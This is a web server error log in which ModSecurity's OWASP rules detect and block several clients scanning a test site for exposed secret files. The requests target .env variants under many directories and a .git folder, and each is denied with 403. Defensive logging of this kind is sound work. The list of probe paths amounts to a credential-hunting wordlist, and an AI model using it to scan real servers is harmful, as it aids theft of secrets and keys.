[Fri Nov 28 03:21:39.371570 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSkHMw-9erAMS4LBdXdtRwAAAAA"]
[Fri Nov 28 03:21:39.371804 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSkHMw-9erAMS4LBdXdtRwAAAAA"]
[Fri Nov 28 03:21:39.372005 2025] [:error] [pid 376321] [client 3.123.22.145:49624] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSkHMw-9erAMS4LBdXdtRwAAAAA"]
[Fri Nov 28 03:21:39.373529 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSkHM46_oD2P8Ob2jfQpwQAAAAQ"]
[Fri Nov 28 03:21:39.373734 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSkHM46_oD2P8Ob2jfQpwQAAAAQ"]
[Fri Nov 28 03:21:39.373896 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSkHM46_oD2P8Ob2jfQpwQAAAAQ"]
[Fri Nov 28 03:21:40.434810 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSkHNI6_oD2P8Ob2jfQpwwAAAAQ"]
[Fri Nov 28 03:21:40.435037 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSkHNI6_oD2P8Ob2jfQpwwAAAAQ"]
[Fri Nov 28 03:21:40.435237 2025] [:error] [pid 376325] [client 3.123.22.145:49748] [client 3.123.22.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSkHNI6_oD2P8Ob2jfQpwwAAAAQ"]
[Fri Nov 28 03:42:09.685006 2025] [:error] [pid 376631] [client 2.57.122.173:41448] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSkMAZjihkEKa1eLtZQM-AAAAAw"]
[Fri Nov 28 03:42:09.685325 2025] [:error] [pid 376631] [client 2.57.122.173:41448] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSkMAZjihkEKa1eLtZQM-AAAAAw"]
[Fri Nov 28 03:42:09.685496 2025] [:error] [pid 376631] [client 2.57.122.173:41448] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSkMAZjihkEKa1eLtZQM-AAAAAw"]
[Fri Nov 28 10:52:12.499683 2025] [authz_core:error] [pid 383775] [client 54.93.216.62:36612] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Nov 28 10:52:12.978482 2025] [:error] [pid 383744] [client 54.93.216.62:36616] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSlwzOvWV_PYlOyBpnvoJAAAAAE"]
[Fri Nov 28 10:52:12.978741 2025] [:error] [pid 383744] [client 54.93.216.62:36616] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSlwzOvWV_PYlOyBpnvoJAAAAAE"]
[Fri Nov 28 10:52:12.978920 2025] [:error] [pid 383744] [client 54.93.216.62:36616] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSlwzOvWV_PYlOyBpnvoJAAAAAE"]
[Fri Nov 28 10:52:12.979758 2025] [:error] [pid 383745] [client 54.93.216.62:36670] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSlwzAb5ueooPMKeAZUj_AAAAAI"]
[Fri Nov 28 10:52:12.979966 2025] [:error] [pid 383745] [client 54.93.216.62:36670] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSlwzAb5ueooPMKeAZUj_AAAAAI"]
[Fri Nov 28 10:52:12.980144 2025] [:error] [pid 383745] [client 54.93.216.62:36670] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSlwzAb5ueooPMKeAZUj_AAAAAI"]
[Fri Nov 28 10:52:12.980485 2025] [:error] [pid 383767] [client 54.93.216.62:36614] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlwzC6M59B_Bph5UHk_BAAAAAc"]
[Fri Nov 28 10:52:12.980657 2025] [:error] [pid 383767] [client 54.93.216.62:36614] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlwzC6M59B_Bph5UHk_BAAAAAc"]
[Fri Nov 28 10:52:12.980809 2025] [:error] [pid 383767] [client 54.93.216.62:36614] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSlwzC6M59B_Bph5UHk_BAAAAAc"]
[Fri Nov 28 10:52:13.512079 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSlwzehaa_ABFroPvQ_clQAAABY"]
[Fri Nov 28 10:52:13.512295 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSlwzehaa_ABFroPvQ_clQAAABY"]
[Fri Nov 28 10:52:13.512495 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSlwzehaa_ABFroPvQ_clQAAABY"]
[Fri Nov 28 10:52:14.191105 2025] [:error] [pid 383773] [client 54.93.216.62:36800] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSlwzjQ0BJwB196vI-qFKgAAAA4"]
[Fri Nov 28 10:52:14.191341 2025] [:error] [pid 383773] [client 54.93.216.62:36800] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSlwzjQ0BJwB196vI-qFKgAAAA4"]
[Fri Nov 28 10:52:14.191519 2025] [:error] [pid 383773] [client 54.93.216.62:36800] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSlwzjQ0BJwB196vI-qFKgAAAA4"]
[Fri Nov 28 10:52:14.606723 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSlwzlkALeIJks_pKUvm3AAAABU"]
[Fri Nov 28 10:52:14.607033 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSlwzlkALeIJks_pKUvm3AAAABU"]
[Fri Nov 28 10:52:14.607295 2025] [:error] [pid 383778] [client 54.93.216.62:36832] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSlwzlkALeIJks_pKUvm3AAAABU"]
[Fri Nov 28 10:52:14.755764 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSlwzkM6gFne4-slYXlYeQAAABI"]
[Fri Nov 28 10:52:14.756054 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSlwzkM6gFne4-slYXlYeQAAABI"]
[Fri Nov 28 10:52:14.756254 2025] [:error] [pid 383775] [client 54.93.216.62:36612] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSlwzkM6gFne4-slYXlYeQAAABI"]
[Fri Nov 28 10:52:15.027359 2025] [:error] [pid 383776] [client 54.93.216.62:36868] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSlwz2LPUgOCndll5WwOhAAAABM"]
[Fri Nov 28 10:52:15.027585 2025] [:error] [pid 383776] [client 54.93.216.62:36868] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSlwz2LPUgOCndll5WwOhAAAABM"]
[Fri Nov 28 10:52:15.027771 2025] [:error] [pid 383776] [client 54.93.216.62:36868] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSlwz2LPUgOCndll5WwOhAAAABM"]
[Fri Nov 28 10:52:15.184441 2025] [:error] [pid 383777] [client 54.93.216.62:36962] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSlwz5_qlGCUHrUZSX0K4gAAABQ"]
[Fri Nov 28 10:52:15.184672 2025] [:error] [pid 383777] [client 54.93.216.62:36962] [client 54.93.216.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSlwz5_qlGCUHrUZSX0K4gAAABQ"]
[Fri Nov 28 10:52:15.184893 2025] [:error] [pid 383777] [client 54.93.216.62:36962] [client 54.93.216.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSlwz5_qlGCUHrUZSX0K4gAAABQ"]
[Fri Nov 28 10:52:15.501632 2025] [:error] [pid 381109] [client 54.93.216.62:36732] [client 54.93.216.62] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSlwz-haa_ABFroPvQ_clgAAABY"]
